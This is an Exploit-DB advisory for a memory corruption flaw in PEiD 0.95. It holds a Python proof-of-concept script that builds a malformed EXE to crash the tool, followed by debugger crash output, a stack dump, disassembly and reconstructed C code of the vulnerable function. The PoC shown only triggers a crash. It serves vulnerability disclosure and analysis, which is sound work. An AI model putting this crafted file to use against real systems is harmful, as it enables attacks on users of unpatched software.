PEiD 0.95 - Memory Corruption (PoC)

EDB-ID:

26413

CVE:





Platform:

Windows

Date:

2013-06-24


# Title: PEiD v0.95 Memory Corruption
# About PEiD :  PEiD is an intuitive application that relies on its user-friendly interface to detect packers, cryptors and compilers found in PE executable files. Very popular among malware researchers for detection of packers / cryptors.
# Date: 22nd June 2013
# Author: Debasish Mandal ( https://twitter.com/debasishm89 )
# Blog : http://www.debasish.in/
# Version: PEiD version 0.95
# Download Link : http://www.softpedia.com/progChangelog/PEiD-updated-Changelog-4102.html
# Tested on: Windows XP SP2 / Windows 7
# Vendor Patch : Unpatched. This software is not under active development. Last stable version released on November 6th, 2008.
# Threat mitigation : Exploitation of this issue requires the user to explicitly open a specially crafted EXE file. So the PEiD user should refrain from opening files from untrusted third parties or accessing untrusted remote sites.

# POC

# c:\python27
junk = "\x41"
header = "MZ"
header += junk * 58
header += "\x80"
header += "\x00" * 3
header += junk * 64
header += "PE"
header += "\x00"*2
header += junk * 3
header += "\x00"
header += junk * 12
header += "\xe0\x00"
header += junk * 2
header += "\x0b\x01"
header += junk * 16
header += "\x00" * 2
header += junk * 338
header += "\x00" * 2
header += junk * 5
header += "\x00" * 3
header += junk * 2427
header += "\xa9"
header += junk * 7
header += "\x90"
header += junk * 3	
header += "\x90"
header += junk * 40
f = open('peid_poc.exe','wb')
f.write(header)
f.close()
'''
Above python code will generate a crafted EXE. This EXE can be used as POC to trigger the Crash of PEiD version 0.95.

(9fc.c2c): Access violation - code c0000005 (!!! second chance !!!)
eax=00000000 ebx=6fbeca5e ecx=00d4fae0 edx=00000019 esi=00000000 edi=91164141
eip=0043d4d1 esp=00d4faac ebp=00d4fee8 iopl=0         nv up ei ng nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000             efl=00000286
*** WARNING: Unable to verify checksum for C:\Documents and Settings\debasish mandal\Desktop\Tools\PEiD-0.95-20081103\PEiD.exe
*** ERROR: Module load completed but symbols could not be loaded for C:\Documents and Settings\debasish mandal\Desktop\Tools\PEiD-0.95-20081103\PEiD.exe
PEiD+0x3d4d1:
0043d4d1 8a0c07          mov     cl,byte ptr [edi+eax]      ds:0023:91164141=??

PEiD Crashes at With Read AV @ 0043d4d1. EDI Register is pointing to ring0 : edi=91164141.

Stack Trace:

0:001> kb
ChildEBP RetAddr  Args to Child              
WARNING: Stack unwind information not available. Following frames may be wrong.
00d4fee8 78b8c3c0 64123456 0000058f c4830000 PEiD+0x3d4d1
00d4ff04 0045d1e6 0040867c 00d4ff7c 00000000 0x78b8c3c0
00d4ff40 00455b97 0040867c 00d4ff7c 00000000 PEiD+0x5d1e6
00d4ffb4 7c80b50b 0048650c 001520a8 0012f4bc PEiD+0x55b97
00d4ffe0 7c80b517 00000000 00000000 00000000 kernel32!BaseThreadStart+0x37
00d4ffe4 00000000 00000000 00000000 00455a50 kernel32!BaseThreadStart+0x43

Stack Dump:

0:001> d esp
00d4faac  41 41 41 90 7c ff d4 00-40 ff d4 00 77 ca be 6f  AAA.|...@...w..o
00d4fabc  e0 fa d4 00 37 4c 44 00-41 41 16 91 77 ca be 6f  ....7LD.AA..w..o
00d4facc  dc fa d4 00 20 01 00 00-18 00 00 00 7c 86 40 00  .... .......|.@.
00d4fadc  90 41 91 7c e8 fe d4 00-19 00 00 00 08 00 00 00  .A.|............
00d4faec  1a 00 00 00 1a 00 00 00-1a 00 00 00 05 00 00 00  ................
00d4fafc  0c 00 00 00 1a 00 00 00-1a 00 00 00 1a 00 00 00  ................
00d4fb0c  1a 00 00 00 1a 00 00 00-1a 00 00 00 1a 00 00 00  ................
00d4fb1c  1a 00 00 00 1a 00 00 00-1a 00 00 00 1a 00 00 00  ................

00DFFAAC   90414141   <- ESP
00DFFAB0   00DFFF7C
00DFFAB4   00DFFF40
00DFFAB8   6FBECA77
00DFFABC   00DFFAE0
00DFFAC0   00444C37  RETURN to PEiD.00444C37 from PEiD.0043D4A0
00DFFAC4   91084141
00DFFAC8   6FBECA77
00DFFACC   00DFFADC
00DFFAD0   00000120
00DFFAD4   00000018
00DFFAD8   0040867C  PEiD.0040867C
00DFFADC   7C914190  RETURN to ntdll.7C914190 from ntdll.7C910387

Disassembly of the function where program crashed. Function : PEiD.0043D4A0 (I've named it as "crash_function")

0043D4A0   51               PUSH ECX
0043D4A1   8B51 04          MOV EDX,DWORD PTR DS:[ECX+4]
0043D4A4   8B4424 0C        MOV EAX,DWORD PTR SS:[ESP+C]
0043D4A8   3BC2             CMP EAX,EDX
0043D4AA   890C24           MOV DWORD PTR SS:[ESP],ECX
0043D4AD   7D 06            JGE SHORT PEiD.0043D4B5
0043D4AF   32C0             XOR AL,AL
0043D4B1   59               POP ECX
0043D4B2   C2 0C00          RETN 0C
0043D4B5   53               PUSH EBX
0043D4B6   55               PUSH EBP
0043D4B7   8BD8             MOV EBX,EAX
0043D4B9   56               PUSH ESI
0043D4BA   2BDA             SUB EBX,EDX
0043D4BC   33F6             XOR ESI,ESI
0043D4BE   57               PUSH EDI
0043D4BF   8B7C24 18        MOV EDI,DWORD PTR SS:[ESP+18]
0043D4C3   85DB             TEST EBX,EBX
0043D4C5   7E 34            JLE SHORT PEiD.0043D4FB
0043D4C7   33C0             XOR EAX,EAX
0043D4C9   85D2             TEST EDX,EDX
0043D4CB   7E 42            JLE SHORT PEiD.0043D50F
0043D4CD   8B29             MOV EBP,DWORD PTR DS:[ECX]
0043D4CF   03FE             ADD EDI,ESI
0043D4D1   8A0C07           MOV CL,BYTE PTR DS:[EDI+EAX]   <- Code crashes here
0043D4D4   3A0C28           CMP CL,BYTE PTR DS:[EAX+EBP]
0043D4D7   75 07            JNZ SHORT PEiD.0043D4E0
0043D4D9   40               INC EAX
0043D4DA   3BC2             CMP EAX,EDX

Setting a BP @ Entry 0x0043D4A0 of this function we can see the value of EDI register is already corrupted before entering into this function. 
To find out the cross reference which means other function calling above function we used IDA Pro. 
IDA Pro Shows us that this function is getting called multiple times:

Direction Type Address        Text                  
--------- ---- -------        ----                  
Down      p    sub_43DF00+E1  call    crash_function
Down      p    sub_43F260+1E9 call    crash_function
Down      p    sub_43F260+230 call    crash_function
Down      p    sub_43F260+312 call    crash_function
Down      p    sub_43F260+346 call    crash_function
Down      p    sub_43F260+382 call    crash_function
Down      p    sub_43F260+3A9 call    crash_function
Down      p    vuln_func+162  call    crash_function
Down      p    sub_446020+1A5 call    crash_function
Down      p    sub_446020+1C7 call    crash_function
Down      p    sub_446020+20F call    crash_function
Down      p    sub_446020+22D call    crash_function
Down      p    sub_446020+271 call    crash_function
Down      p    sub_446020+28F call    crash_function
Down      p    sub_446020+2D6 call    crash_function
Down      p    sub_446020+2F8 call    crash_function
Down      p    sub_446020+339 call    crash_function
Down      p    sub_446020+357 call    crash_function

After Analyzing the code It was found found that below function is actually calling the PEiD.0043D4A0 function which triggers the crash: 
This is the actual vulnerable function which causes the corruption.

00444AD0   81EC 2C040000    SUB ESP,42C
00444AD6   A1 D4A54000      MOV EAX,DWORD PTR DS:[40A5D4]
00444ADB   33C4             XOR EAX,ESP
00444ADD   898424 28040000  MOV DWORD PTR SS:[ESP+428],EAX
00444AE4   33C9             XOR ECX,ECX
00444AE6   56               PUSH ESI
00444AE7   8BB424 38040000  MOV ESI,DWORD PTR SS:[ESP+438]
00444AEE   8B46 0C          MOV EAX,DWORD PTR DS:[ESI+C]
00444AF1   C68424 10040000 >MOV BYTE PTR SS:[ESP+410],89
00444AF9   C68424 11040000 >MOV BYTE PTR SS:[ESP+411],4A
00444B01   C68424 12040000 >MOV BYTE PTR SS:[ESP+412],0FC
00444B09   C68424 13040000 >MOV BYTE PTR SS:[ESP+413],33
00444B11   C68424 14040000 >MOV BYTE PTR SS:[ESP+414],0C0
00444B19   C68424 15040000 >MOV BYTE PTR SS:[ESP+415],0C3
00444B21   C68424 16040000 >MOV BYTE PTR SS:[ESP+416],0B8
00444B29   C68424 17040000 >MOV BYTE PTR SS:[ESP+417],78
00444B31   C68424 18040000 >MOV BYTE PTR SS:[ESP+418],56
00444B39   C68424 19040000 >MOV BYTE PTR SS:[ESP+419],34
00444B41   C68424 1A040000 >MOV BYTE PTR SS:[ESP+41A],12
00444B49   C68424 1B040000 >MOV BYTE PTR SS:[ESP+41B],64
00444B51   C68424 1C040000 >MOV BYTE PTR SS:[ESP+41C],8F
00444B59   C68424 1D040000 >MOV BYTE PTR SS:[ESP+41D],5
00444B61   888C24 1E040000  MOV BYTE PTR SS:[ESP+41E],CL
00444B68   888C24 1F040000  MOV BYTE PTR SS:[ESP+41F],CL
00444B6F   888C24 20040000  MOV BYTE PTR SS:[ESP+420],CL
00444B76   888C24 21040000  MOV BYTE PTR SS:[ESP+421],CL
00444B7D   C68424 22040000 >MOV BYTE PTR SS:[ESP+422],83
00444B85   C68424 23040000 >MOV BYTE PTR SS:[ESP+423],0C4
00444B8D   C68424 24040000 >MOV BYTE PTR SS:[ESP+424],4
00444B95   C68424 25040000 >MOV BYTE PTR SS:[ESP+425],55
00444B9D   C68424 26040000 >MOV BYTE PTR SS:[ESP+426],53
00444BA5   C68424 27040000 >MOV BYTE PTR SS:[ESP+427],51
00444BAD   C68424 28040000 >MOV BYTE PTR SS:[ESP+428],57
00444BB5   0FB740 06        MOVZX EAX,WORD PTR DS:[EAX+6]
00444BB9   83F8 02          CMP EAX,2
00444BBC   73 18            JNB SHORT PEiD.00444BD6
00444BBE   32C0             XOR AL,AL
00444BC0   5E               POP ESI
00444BC1   8B8C24 28040000  MOV ECX,DWORD PTR SS:[ESP+428]
00444BC8   33CC             XOR ECX,ESP
00444BCA   E8 A88F0200      CALL PEiD.0046DB77
00444BCF   81C4 2C040000    ADD ESP,42C
00444BD5   C3               RETN
00444BD6   53               PUSH EBX
00444BD7   57               PUSH EDI
00444BD8   8B7E 18          MOV EDI,DWORD PTR DS:[ESI+18]
00444BDB   8D1480           LEA EDX,DWORD PTR DS:[EAX+EAX*4]
00444BDE   8B7CD7 EC        MOV EDI,DWORD PTR DS:[EDI+EDX*8-14] 
00444BE2   51               PUSH ECX
00444BE3   48               DEC EAX
00444BE4   50               PUSH EAX
00444BE5   8BCE             MOV ECX,ESI
00444BE7   E8 748A0100      CALL PEiD.0045D660
00444BEC   8BD8             MOV EBX,EAX
00444BEE   8D043B           LEA EAX,DWORD PTR DS:[EBX+EDI]
00444BF1   3B46 04          CMP EAX,DWORD PTR DS:[ESI+4]
00444BF4   76 1A            JBE SHORT PEiD.00444C10
00444BF6   5F               POP EDI
00444BF7   5B               POP EBX
00444BF8   32C0             XOR AL,AL
00444BFA   5E               POP ESI
00444BFB   8B8C24 28040000  MOV ECX,DWORD PTR SS:[ESP+428]
00444C02   33CC             XOR ECX,ESP
00444C04   E8 6E8F0200      CALL PEiD.0046DB77
00444C09   81C4 2C040000    ADD ESP,42C
00444C0F   C3               RETN
00444C10   6A 19            PUSH 19
00444C12   8D8C24 1C040000  LEA ECX,DWORD PTR SS:[ESP+41C]
00444C19   51               PUSH ECX
00444C1A   8D4C24 18        LEA ECX,DWORD PTR SS:[ESP+18]
00444C1E   E8 1D87FFFF      CALL PEiD.0043D340
00444C23   8B06             MOV EAX,DWORD PTR DS:[ESI]
00444C25   8D5424 0C        LEA EDX,DWORD PTR SS:[ESP+C]
00444C29   52               PUSH EDX
00444C2A   53               PUSH EBX
00444C2B   03C7             ADD EAX,EDI
00444C2D   50               PUSH EAX
00444C2E   8D4C24 1C        LEA ECX,DWORD PTR SS:[ESP+1C]
00444C32   E8 6988FFFF      CALL PEiD.0043D4A0                  <- CAll to the crash function

Equivalent C Code:

char vuln_func(int a1, int a2)
{
  int v6;
  v3 = (a2 + 12);
  v9 = -119;
  v10 = 74;
  v11 = -4;
// Declaration of few more local variables. Ommited
  v2 = (v3 + 6);
  if ( v2 >= 2 )
  {
    v6 = ((a2 + 24) + 40 * v2 - 20);   // <<---
    v5 = before_crash1(a2, v2 - 1, 0); 
    if ((v5 + v6) <= (a2 + 4) )
    {
      before_crash2(&v9, 25);
      result = crash_function((int)&v8, v6 + a2, v5, (int)&v7);	//Vulnerable function calling the crash_function. Inside this peid prog. will crash
    }
    else
    {
      result = 0;
    }
  }
  else
  {
    result = 0;
  }
  return result;
}

'''